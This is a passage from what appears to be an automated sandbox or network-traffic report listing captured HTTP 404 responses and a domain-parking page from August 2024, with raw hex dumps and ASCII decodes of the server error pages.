63 56 dd 4a 07 49 07 13 be e7 a2 79 a3 34 7f 98 4a d9 1a 48 cf d9 50 61 64 be 1b 96 ab 25 b4 57 41 e0 07 87 ec 50 13 cb e8 13 06 76 a3 54 1c 08 16 c9 2c 3c 8a 36 d8 c2 cf 2c 17 c1 05 46 23 8d 84 87 96 6d b6 53 51 be 99 ba 83 64 b4 34 56 db 7e 67 9c a1 ba 6d 0c 61 2b a1 ff b5 c8 7c ad 14 a9 5c c6 98 9d 7c 6a b5 bb 2d d7 e9 f6 22 e0 81 c6 52 41 71 1c 6e dc 6a a5 15 34 e4 54 89 1e 3d c5 7b c7 d9 5c d8 d5 f0 fc 88 44 8a d4 15 4c 14 7f 1d ef c5 8f e2 9d f8 b1 88 bf 8d ef 24 ef e3 e3 bd 78 37 f9 20 b9 81 cf bb f8 dd 8b b7 e3 3b 54 bd bd e4 b5 c3 e1 4a 1d 9e a8 7d b6 6d 10 6a 33 ac f6 a2 68 18 9e b5 2c 38 9e 09 d7 d5 ce e0 f9 1b be eb fa 5b c2 f3 fd a1 02 4a f0 01 7e 00 b4 a8 00 78 96 41 97 1c ba d5 86 c7 f7 21 cc df 68 76 33 79 3f b9 59 b7 64 b3 6e 61 1d cd fa cc 62 ba aa d5 4a bd dc d8 0a e4 70 88 41 53 05 cf 96 b7 d8 17 5b e4 b0 5e b4 b0 11 9b a5 e7 87 11 08 c4 08 23 19 39 36 0c 30 33 eb 94 ae 8d 74 7e b2 d3 f2 44 1b 33 16 31 98 1a 4a 73 38 a3 b7 dc ac 0f 17 f7 eb 28 8d 60 b8 e9 b3 db a9 de 0e 9a f1 ae 36 55 fc 84 6c 18 3f 61 bb 3e d8 67 c9 29 75 0f 17 2d b9 3d 8a 22 df 0b 33 5d 63 cd 05 00 e8 4a 48 a9 3f c0 00 ae 1f b4 d8 c2 ca b3 09 66 69 45 e8 bc a7 5a b0 fd 40 ba 6c 88 54 9f 79 ff 5c 77 69 7b 36 0a b8 b8 30 c4 50 76 3a 30 51 cb 25 d4 cc a2 8e 88 59 23 cf da ea f9 4e 68 ad da 3d 65 f7 1b 4b 1d 0e 10 b3 bc bd 24 07 c3 15 b4 6f 85 fe 28 b0 55 23 9b 9e 18 b9 d4 fc 0d 8d 40 08 14 c5 b5 92 c3 14 65 67 ca 2e f8 e1 c1 6b e9 f8 03 e9 e4 c4 9e 39 4b 41 6c dd c0 f2 d4 96 b5 3a 8a 06 99 64 fb 24 a7 3a 8a 2b a3 41 26 f5 12 15 d9 58 91 74 ba 5e 23 84 82 bc 4e 0b e3 1c bc c8 f8 1f 00 c4 7f e3 1d 91 7c 14 ef 25 9f 24 37 45 7c 3f e3 82 a3 05 f7 43 9c f3 e6 60 75 18 f8 0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 27 Aug 2024 15:47:47 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 32 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 74 bc 8e ea 87 66 38 94 b6 aa 5b ba bc ee 3a 5e 5f 04 ca 6d 94 c2 68 ec aa b0 a7 14 a6 18 a8 8e 23 1b 25 e9 ba 25 d1 0b d4 46 2e 28 0b 66 c8 51 e4 9b 76 18 62 f8 49 7f 07 4b c8 5a 6f 48 c8 e4 7b 26 fe ac 2e 97 04 e9 0e aa 1a c8 ae b2 ae 18 dc b0 59 0f ed c0 19 46 4d eb 58 fd e8 fa f9 0b e7 2e 9d 5b 3f 66 1d d9 82 90 fe 96 19 05 d2 ee af 71 83 8b be ec 88 86 d8 18 79 76 e4 f8 5e a5 7a f5 fa ca 11 eb d8 e5 cb cd 63 56 dd 4a 07 49 07 13 be e7 a2 79 a3 34 7f 98 4a d9 1a 48 cf d9 50 61 64 be 1b 96 ab 25 b4 57 41 e0 07 87 ec 50 13 cb e8 13 06 76 a3 54 1c 08 16 c9 2c 3c 8a 36 d8 c2 cf 2c 17 c1 05 46 23 8d 84 87 96 6d b6 53 51 be 99 ba 83 64 b4 34 56 db 7e 67 9c a1 ba 6d 0c 61 2b a1 ff b5 c8 7c ad 14 a9 5c c6 98 9d 7c 6a b5 bb 2d d7 e9 f6 22 e0 81 c6 52 41 71 1c 6e dc 6a a5 15 34 e4 54 89 1e 3d c5 7b c7 d9 5c d8 d5 f0 fc 88 44 8a d4 15 4c 14 7f 1d ef c5 8f e2 9d f8 b1 88 bf 8d ef 24 ef e3 e3 bd 78 37 f9 20 b9 81 cf bb f8 dd 8b b7 e3 3b 54 bd bd e4 b5 c3 e1 4a 1d 9e a8 7d b6 6d 10 6a 33 ac f6 a2 68 18 9e b5 2c 38 9e 09 d7 d5 ce e0 f9 1b be eb fa 5b c2 f3 fd a1 02 4a f0 01 7e 00 b4 a8 00 78 96 41 97 1c ba d5 86 c7 f7 21 cc df 68 76 33 79 3f b9 59 b7 64 b3 6e 61 1d cd fa cc 62 ba aa d5 4a bd dc d8 0a e4 70 88 41 53 05 cf 96 b7 d8 17 5b e4 b0 5e b4 b0 11 9b a5 e7 87 11 08 c4 08 23 19 39 36 0c 30 33 eb 94 ae 8d 74 7e b2 d3 f2 44 1b 33 16 31 98 1a 4a 73 38 a3 b7 dc ac 0f 17 f7 eb 28 8d 60 b8 e9 b3 db a9 de 0e 9a f1 ae 36 55 fc 84 6c 18 3f 61 bb 3e d8 67 c9 29 75 0f 17 2d b9 3d 8a 22 df 0b 33 5d 63 cd 05 00 e8 4a 48 a9 3f c0 00 ae 1f b4 d8 c2 ca b3 09 66 69 45 e8 bc a7 5a b0 fd 40 ba 6c 88 54 9f 79 ff 5c 77 69 7b 36 0a b8 b8 30 c4 50 76 3a 30 51 cb 25 d4 cc a2 8e 88 59 23 cf da ea f9 4e 68 ad da 3d 65 f7 1b 4b 1d 0e 10 b3 bc bd 24 07 c3 15 b4 6f 85 fe 28 b0 55 23 9b 9e 18 b9 d4 fc 0d 8d 40 08 14 c5 b5 92 c3 14 65 67 ca 2e f8 e1 c1 6b e9 f8 03 e9 e4 c4 9e 39 4b 41 6c dd c0 f2 d4 96 b5 3a 8a 06 99 64 fb 24 a7 3a 8a 2b a3 41 26 f5 12 15 d9 58 91 74 ba 5e 23 84 82 bc 4e 0b e3 1c bc c8 f8 1f 00 c4 7f e3 1d 91 7c 14 ef 25 9f 24 37 45 7c 3f e3 82 a3 05 f7 43 9c f3 e6 60 75 18 f8 0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 27 Aug 2024 15:47:49 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeData Raw: 32 39 33 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 69 6e 64 65 6b 73 2e 73 70 61 63 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 3c 73 63 72 69 70 74 3e 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 0a 2f 2a 5d 5d 3e 2a 2f 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 20 62 2d 70 61 67 65 5f 74 79 70 65 5f 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 5f 62 67 5f 6c 69 67 68 74 22 3e 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 5f 74 79 70 65 5f 72 64 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 2d 6e 6f 74 65 20 62 2d 74 65 78 74 22 3e d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 b7 d0 b0 d1 80 d0 b5 d0 b3 d0 b8 d1 81 d
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Tue, 27 Aug 2024 15:48:09 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-08-27T15:48:14.7949232Z
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Tue, 27 Aug 2024 15:48:12 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 18X-Rate-Limit-Reset: 2024-08-27T15:48:14.7949232Z
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Tue, 27 Aug 2024 15:48:15 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-08-27T15:48:20.7715590Z
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Tue, 27 Aug 2024 15:48:18 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-08-27T15:48:23.0765341Z
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 27 Aug 2024 15:48:31 GMTServer: Apache/2.4.58 (Ubuntu)Content-Length: 277Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 74 68 65 61 6a 69 2e 73 68 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Ubuntu) Server at www.theaji.shop Port 80</address></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 27 Aug 2024 15:48:34 GMTServer: Apache/2.4.58 (Ubuntu)Content-Length: 277Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 74 68 65 61 6a 69 2e 73 68 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Ubuntu) Server at www.theaji.shop Port 80</address></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 27 Aug 2024 15:48:36 GMTServer: Apache/2.4.58 (Ubuntu)Content-Length: 277Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 74 68 65 61 6a 69 2e 73 68 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Ubuntu) Server at www.theaji.shop Port 80</address></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 27 Aug 2024 15:48:39 GMTServer: Apache/2.4.58 (Ubuntu)Content-Length: 277Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 74 68 65 61 6a 69 2e 73 68 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Ubuntu) Server at www.theaji.shop Port 80</address></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Tue, 27 Aug 2024 15:48:45 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Tue, 27 Aug 2024 15:48:48 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
